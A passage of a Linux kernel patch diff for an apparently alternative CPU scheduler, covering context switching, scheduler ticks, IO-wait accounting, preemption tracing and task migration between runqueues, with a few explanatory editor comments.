-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch has flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could race with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing through
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible for using it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data: preferring shallow idle state selection
-+ * for a CPU that has IO-wait which might not even end up running the task when
-+ * it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait accounting is to account the idle time that we could
-+ * have spent running if it were not for IO. That is, if we were to improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've run at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means that, when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, by reason of under-accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU; it can wake up on a CPU other than
-+ * the one it blocked on. This means the per-CPU IO-wait number is meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
-+
-+/*
-+ * Return accounted runtime for the task.
-+ * In case the task is currently running, return the runtime plus the
-+ * pending runtime that has not been accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have an optimization chance when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks that have less than RESCHED_NS of time slice left will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if (kstrtol(str, 0, &val)) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger sibling group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = !is_idle_task(curr) && (rq->nr_running == 1) &&
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
-+	      !is_migration_disabled(curr) && !rq->active_balance;
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - sibling group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only a cpu in the sibling idle group will do the checking and
-+	 * then find potential cpus which can migrate the currently running task
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too much is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * frequency is large enough to avoid overload but short enough
-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+	int os;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	/* There cannot be competing actions, but don't rely on stop-machine. */
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
-+	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
-+	/* Don't cancel, as this would mess up the state machine. */
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
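-+
-+/*
-+ * Editor's sketch (illustrative, not part of the original patch): only
-+ * the outermost disable/enable pair is timed, because the helpers above
-+ * compare preempt_count() against the passed-in value:
-+ *
-+ *	preempt_disable();	(count 0 -> 1, preempt_latency_start(1) fires)
-+ *	preempt_disable();	(count 1 -> 2, no trace)
-+ *	preempt_enable();	(count 2 -> 1, no trace)
-+ *	preempt_enable();	(count 1 -> 0, preempt_latency_stop(1) fires)
-+ */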
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
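-+
-+/*
-+ * Editor's worked example (not part of the original patch): with 8
-+ * runnable tasks on @rq, nr_tries = min(8 / 2, sysctl_sched_nr_migrate),
-+ * so at most 4 candidates are even considered and the source runqueue
-+ * is never drained of its current task.
-+ */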
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
